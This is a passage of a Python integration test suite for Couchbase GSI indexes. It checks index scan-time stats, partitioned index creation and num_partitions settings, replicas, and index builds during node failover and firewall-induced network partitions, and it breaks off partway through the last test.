'''Run a query that uses two different indexes at once and make sure both are properly updated'''
def test_index_last_query_multiple_indexes(self):
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertTrue(indexer_nodes, "There are no indexer nodes in the cluster!")
# Ensure last_known_scan_time starts at default value
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
self.assertEqual(indexes['default'][index]['last_known_scan_time'], 0)
else:
continue
# Construct a query that uses both created indexes and ensure they both have a last used timestamp
use_index_query = 'select * from default where age > 50 and name = "Caryssa"'
self.n1ql_helper.run_cbq_query(query=use_index_query, server= self.n1ql_node)
current_time = int(time.time())
self.log.info(current_time)
# All indexes that were created should be used
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
self.assertTrue(current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60, 'The timestamp is more than a minute off')
else:
continue
'''Make sure that two indexes with the same name on two different buckets does not cause an incorrect update of stat'''
def test_index_last_query_stat_multiple_buckets(self):
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
create_index_query2 = "CREATE INDEX idx ON standard_bucket0(age) USING GSI"
create_index_query3 = "CREATE INDEX idx2 ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertTrue(indexer_nodes, "There are no indexer nodes in the cluster!")
# Ensure last_known_scan_time starts at default value
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
self.fail_if_no_buckets()
for bucket in self.buckets:
if bucket.name in indexes:
for index in indexes[bucket.name]:
self.assertEqual(indexes[bucket.name][index]['last_known_scan_time'], 0)
else:
continue
# Implicitly or Explicitly use the index in question
if self.implicit_use_index:
use_index_query = 'select * from default where age > 50'
else:
use_index_query = 'select * from default USE INDEX (idx using GSI) where age > 50'
self.n1ql_helper.run_cbq_query(query=use_index_query, server= self.n1ql_node)
current_time = int(time.time())
self.log.info(current_time)
used_index = 'idx'
used_bucket = 'default'
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
self.fail_if_no_buckets()
for bucket in self.buckets:
if bucket.name in indexes:
for index in indexes[bucket.name]:
if index == used_index and used_bucket == bucket.name:
self.assertTrue(current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60, 'The timestamp is more than a minute off')
else:
self.assertTrue(indexes[bucket.name][index]['last_known_scan_time'] == 0)
else:
continue
# Test that generates n number of create index statements with various permutations and combinations
# of different clauses used in the create index statement.
def test_create_partitioned_indexes(self):
self._load_emp_dataset(end=self.num_items)
create_index_queries = self.generate_random_create_index_statements(
bucketname=self.buckets[0].name, idx_node_list=self.node_list,
num_statements=self.num_queries)
failed_index_creation = 0
for create_index_query in create_index_queries:
try:
self.n1ql_helper.run_cbq_query(
query=create_index_query["index_definition"],
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(10)
index_metadata = self.rest.get_indexer_metadata()
index_map = self.get_index_map()
if index_metadata:
status = self.validate_partitioned_indexes(create_index_query,
index_map,
index_metadata)
if not status:
failed_index_creation += 1
self.log.info(
"** Following query failed validation : {0}".format(
create_index_query["index_definition"]))
else:
failed_index_creation += 1
self.log.info(
"** Following index did not get created : {0}".format(
create_index_query["index_definition"]))
self.log.info("output from /getIndexStatus")
self.log.info(index_metadata)
self.log.info("Index Map")
self.log.info(index_map)
drop_index_query = "DROP INDEX default.{0}".format(
create_index_query["index_name"])
try:
self.n1ql_helper.run_cbq_query(
query=drop_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.log.info(
"Total Create Index Statements Run: {0}, Passed : {1}, Failed : {2}".format(
self.num_queries, self.num_queries - failed_index_creation,
failed_index_creation))
self.assertTrue(failed_index_creation == 0,
"Some create index statements failed validations. Pls see the test log above for details.")
def test_partition_index_with_excluded_nodes(self):
self._load_emp_dataset(end=self.num_items)
# Setting to exclude a node for planner
self.rest.set_index_planner_settings("excludeNode=in")
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
# Validate index created and check the hosts on which partitions are hosted.
expected_hosts = self.node_list[1:]
expected_hosts.sort()
validated = False
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
for index in index_metadata["status"]:
if index["name"] == "idx1":
self.log.info("Expected Hosts : {0}".format(expected_hosts))
self.log.info("Actual Hosts : {0}".format(index["hosts"]))
self.assertNotIn(self.node_list[0], index["hosts"],
"Planner did not ignore excluded node during index creation")
#self.assertEqual(index["hosts"], expected_hosts,
# "Planner did not ignore excluded node during index creation")
validated = True
if not validated:
self.fail("Looks like index was not created.")
def test_replica_partition_index_with_excluded_nodes(self):
self._load_emp_dataset(end=self.num_items)
# Setting to exclude a node for planner
self.rest.set_index_planner_settings("excludeNode=in")
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}}}".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
index_names = []
index_names.append("idx1")
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
# Need to see if the indexes get created in the first place
# Validate index created and check the hosts on which partitions are hosted.
expected_hosts = self.node_list[1:]
expected_hosts.sort()
validated = False
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
index_validated = 0
for index_name in index_names:
for index in index_metadata["status"]:
if index["name"] == index_name:
self.log.info("Expected Hosts : {0}".format(expected_hosts))
self.log.info("Actual Hosts : {0}".format(index["hosts"]))
self.assertEqual(index["hosts"], expected_hosts,
"Planner did not ignore excluded node during index creation for {0}".format(
index_name))
index_validated += 1
self.assertEqual(index_validated, (self.num_index_replicas + 1),
"All index replicas not created")
def test_partition_index_by_non_indexed_field(self):
self._load_emp_dataset(end=self.num_items)
create_index_statement = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = "idx1"
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
def test_default_num_partitions(self):
self._load_emp_dataset(end=self.num_items)
self.rest.set_index_settings(
{"indexer.numPartitions": 6})
create_index_statement = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = "idx1"
index_details["num_partitions"] = 6
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
def test_change_default_num_partitions_after_create_index(self):
self._load_emp_dataset(end=self.num_items)
self.rest.set_index_settings(
{"indexer.numPartitions": 16})
create_index_statement = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = "idx1"
index_details["num_partitions"] = 16
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
self.rest.set_index_settings(
{"indexer.numPartitions": 32})
create_index_statement = "CREATE INDEX idx2 on default(namesalary) partition by hash(salary) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = "idx2"
index_details["num_partitions"] = 32
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
# Validate num_partitions for idx1 doesn't change
index_details = {}
index_details["index_name"] = "idx1"
index_details["num_partitions"] = 16
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Num partitions for existing indexes changed after updating default value")
def test_default_num_partitions_negative(self):
self._load_emp_dataset(end=self.num_items)
self.rest.set_index_settings(
{"indexer.numPartitions": 8})
numpartition_values_str = ["abc", "2018-03-04 18:02:37"]
numpartition_values_num = [0, -5, 46.6789]
for value in numpartition_values_str:
indexname = "index_" + str(random.randint(1, 100))
try:
self.rest.set_index_settings(
{"indexer.numPartitions": '{0}'.format(value)})
create_index_statement = "CREATE INDEX {0} on default(name,dept) partition by hash(salary) USING GSI".format(
indexname)
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = indexname
if (not isinstance(value, str)) and int(value) > 0:
index_details["num_partitions"] = int(value)
else:
index_details["num_partitions"] = 8
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
for value in numpartition_values_num:
indexname = "index_" + str(random.randint(101, 200))
try:
self.rest.set_index_settings(
{"indexer.numPartitions": value})
create_index_statement = "CREATE INDEX {0} on default(name,dept) partition by hash(salary) USING GSI".format(
indexname)
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = indexname
if (not isinstance(value, str)) and int(value) > 0:
index_details["num_partitions"] = int(value)
else:
index_details["num_partitions"] = 8
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
def test_numpartitions_negative(self):
self._load_emp_dataset(end=self.num_items)
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':null}}"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
numpartition_values_str = ["abc", "2018-03-04 18:02:37"]
for value in numpartition_values_str:
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':'{0}'}}".format(
value)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
else:
self.fail(
"Index got created with an invalid num_partition value : {0}".format(
value))
numpartition_values_num = [0, -5]
for value in numpartition_values_num:
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':{0}}}".format(
value)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
else:
self.fail(
"Index got created with an invalid num_partition value : {0}".format(
value))
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {'num_partition':47.6789}"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"Index did not get created with an double value for num_partition value : 47.6789")
else:
self.log.info("Index got created successfully with num_partition being a double value : 47.6789")
def test_partitioned_index_with_replica(self):
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
self.assertTrue(self.validate_partition_map(index_metadata, "idx1",
self.num_index_replicas,
self.num_index_partitions),
"Partition map validation failed")
def test_partitioned_index_with_replica_with_server_groups(self):
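        """Create a partitioned index with replicas after defining server
        groups, then check that the index and its replicas are not placed on
        an identical set of hosts (see the distribution note below)."""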
self._load_emp_dataset(end=self.num_items)
self._create_server_groups()
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}}}".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
index_metadata = self.rest.get_indexer_metadata()
index_hosts_list = []
for index in index_metadata["status"]:
index_hosts_list.append(index["hosts"])
self.log.info("Index Host List : {0}".format(index_hosts_list))
# Need to change the validation logic here. Between index and its replicas, they should have a full set of partitions in both the server groups.
# idx11 - .101, .102: 3, 4, 5, 10, 11, 15, 16
# idx11 - .103, .104: 1, 2, 6, 7, 8, 9, 12, 13, 14
# idx12 - .101, .102: 1, 2, 6, 7, 8, 9, 12, 13, 14
# idx12 - .103, .104: 3, 4, 5, 10, 11, 15, 16
validation = True
for i in range(0, len(index_hosts_list)):
for j in range(i + 1, len(index_hosts_list)):
                # list.sort() returns None, so compare sorted copies of the
                # host lists; an index and its replica sharing an identical
                # host set means server grouping was not honoured.
                if sorted(index_hosts_list[i]) != sorted(index_hosts_list[j]):
                    continue
                else:
                    validation &= False
self.assertTrue(validation,
"Partitions of replica indexes do not honour server grouping")
def test_create_partitioned_index_one_node_already_down(self):
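        """Fail over one node first, then create a partitioned index and
        verify that none of its partitions land on the failed-over node."""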
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=60)
failover_task.result()
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("Failed to create index with one node failed")
if node_out == self.index_servers[0]:
rest = RestConnection(self.index_servers[1])
else:
rest = self.rest
index_metadata = rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
hosts = index_metadata["status"][0]["hosts"]
self.log.info("Actual nodes : {0}".format(hosts))
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str not in hosts,
"Partitioned index not created on expected hosts")
def test_create_partitioned_index_one_node_network_partitioned(self):
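        """Firewall off one node, create a partitioned index, heal the network
        partition, and verify the index was not placed on the isolated node."""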
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
self.start_firewall_on_node(node_out)
self.sleep(10)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("Failed to create index with one node failed")
finally:
# Heal network partition and wait for some time to allow indexes
# to get built automatically on that node
self.stop_firewall_on_node(node_out)
self.sleep(120)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
hosts = index_metadata["status"][0]["hosts"]
self.log.info("Actual nodes : {0}".format(hosts))
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str not in hosts,
"Partitioned index not created on expected hosts")
def test_node_fails_during_create_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
threads = []
threads.append(
Thread(target=self.n1ql_helper.run_cbq_query, name="run_query",
args=(create_index_statement, 10, self.n1ql_node)))
threads.append(
Thread(target=self.cluster.failover, name="failover", args=(
self.servers[:self.nodes_init], [node_out], self.graceful,
False, 60)))
for thread in threads:
thread.start()
self.sleep(5)
for thread in threads:
thread.join()
self.sleep(30)
if node_out == self.index_servers[0]:
rest = RestConnection(self.index_servers[1])
else:
rest = self.rest
index_metadata = rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
def test_node_nw_partitioned_during_create_partitioned_index(self):
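        """Trigger a network partition while a partitioned index is being
        created; after the partition is healed, the index is expected to be
        placed on all index nodes, including the one that was cut off."""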
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
threads = []
threads.append(
Thread(target=self.start_firewall_on_node,
name="network_partitioning", args=(node_out,)))
threads.append(
Thread(target=self.n1ql_helper.run_cbq_query, name="run_query",
args=(create_index_statement, 10, self.n1ql_node)))
for thread in threads:
thread.start()
self.sleep(5)
for thread in threads:
thread.join()
self.sleep(10)
try:
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
if index_metadata != {}:
hosts = index_metadata["status"][0]["hosts"]
self.log.info("Actual nodes : {0}".format(hosts))
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str not in hosts,
"Partitioned index not created on expected hosts")
else:
self.log.info(
"Cannot retrieve index metadata since one node is down")
except Exception as ex:
self.log.info(str(ex))
finally:
self.stop_firewall_on_node(node_out)
self.sleep(30)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
hosts = index_metadata["status"][0]["hosts"]
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str in hosts,
"Partitioned index not created on all hosts")
def test_node_nw_partitioned_during_create_partitioned_index_with_node_list(
self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'nodes' : {0}}}".format(
node_list_str)
threads = []
threads.append(
Thread(target=self.start_firewall_on_node,
name="network_partitioning", args=(node_out,)))
threads.append(
Thread(target=self.n1ql_helper.run_cbq_query, name="run_query",
args=(create_index_statement, 10, self.n1ql_node)))
for thread in threads:
thread.start()
self.sleep(5)
for thread in threads:
thread.join()
self.sleep(10)
try:
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
if index_metadata != {}:
hosts = index_metadata["status"][0]["hosts"]
self.log.info("Actual nodes : {0}".format(hosts))
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str not in hosts,
"Partitioned index not created on expected hosts")
else:
self.log.info(
"Cannot retrieve index metadata since one node is down")
except Exception as ex:
self.log.info(str(ex))
finally:
self.stop_firewall_on_node(node_out)
self.sleep(30)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
hosts = index_metadata["status"][0]["hosts"]
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str in hosts,
"Partitioned index not created on all hosts")
def test_build_partitioned_index(self):
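        """Create a deferred partitioned index (optionally with replicas) and
        validate its metadata both before and after BUILD INDEX."""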
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
if self.num_index_replicas > 0:
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'defer_build': true, 'num_replica':{1}}};".format(
self.num_index_partitions, self.num_index_replicas)
else:
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'defer_build': true}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = True
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
# Validation for replica indexes
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_details[
"index_name"] = index_name_prefix + " (replica {0})".format(
str(i))
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
build_index_query = "BUILD INDEX on `default`(" + index_name_prefix + ")"
try:
self.n1ql_helper.run_cbq_query(query=build_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index building failed with error : {0}".format(str(ex)))
self.sleep(30)
index_map = self.get_index_map()
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
index_details["index_name"] = index_name_prefix
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
# Validation for replica indexes
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_details[
"index_name"] = index_name_prefix + " (replica {0})".format(
str(i))
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
def test_build_partitioned_index_one_failed_node(self):
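        """Build a deferred partitioned index while one of its nodes is failed
        over; optionally add the node back and verify that all partitions are
        built after recovery."""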
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}, 'defer_build': true}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = True
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
node_out = self.servers[self.node_out]
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
build_index_query = "BUILD INDEX on `default`(" + index_name_prefix + ")"
try:
self.n1ql_helper.run_cbq_query(query=build_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index building failed with error : {0}".format(str(ex)))
self.sleep(30)
index_map = self.get_index_map()
if node_out == self.index_servers[0]:
rest = RestConnection(self.index_servers[1])
else:
rest = self.rest
index_metadata = rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
index_details["defer_build"] = False
        # At this point, since one node is in a failed state, not all partitions would be built.
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata, skip_numpartitions_check=True),
"Deferred Partitioned index created not as expected")
# Recover the failed node and check if after recovery, all partitions are built.
if self.recover_failed_node:
nodes_all = self.rest.node_statuses()
for node in nodes_all:
if node.ip == node_out.ip:
break
self.rest.set_recovery_type(node.id, self.recovery_type)
self.rest.add_back_node(node.id)
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
[], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached,
"rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(180)
index_map = self.get_index_map()
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
def test_failover_during_build_partitioned_index(self):
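        """Run BUILD INDEX concurrently with a node failover, then validate
        the index while skipping the partition-count check."""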
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}, 'defer_build': true}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = True
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
node_out = self.servers[self.node_out]
build_index_query = "BUILD INDEX on `default`(" + index_name_prefix + ")"
threads = []
threads.append(
Thread(target=self.n1ql_helper.run_cbq_query, name="run_query",
args=(build_index_query, 10, self.n1ql_node)))
threads.append(
Thread(target=self.cluster.async_failover, name="failover", args=(
self.servers[:self.nodes_init], [node_out], self.graceful)))
        # Start both threads before joining so the failover runs concurrently
        # with the BUILD INDEX statement.
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
self.sleep(30)
index_map = self.get_index_map()
if node_out == self.index_servers[0]:
rest = RestConnection(self.index_servers[1])
else:
rest = self.rest
index_metadata = rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
index_details["defer_build"] = False
        # At this point, since one node is in a failed state, not all partitions would be built.
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata, skip_numpartitions_check=True),
"Deferred Partitioned index created not as expected")
def test_build_partitioned_index_with_network_partitioning(self):
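        """Issue BUILD INDEX while one index node is firewalled off; the build
        should either succeed or fail with a retry-in-background error, and
        complete once the network partition is healed."""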
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}, 'defer_build': true}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = True
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
node_out = self.servers[self.node_out]
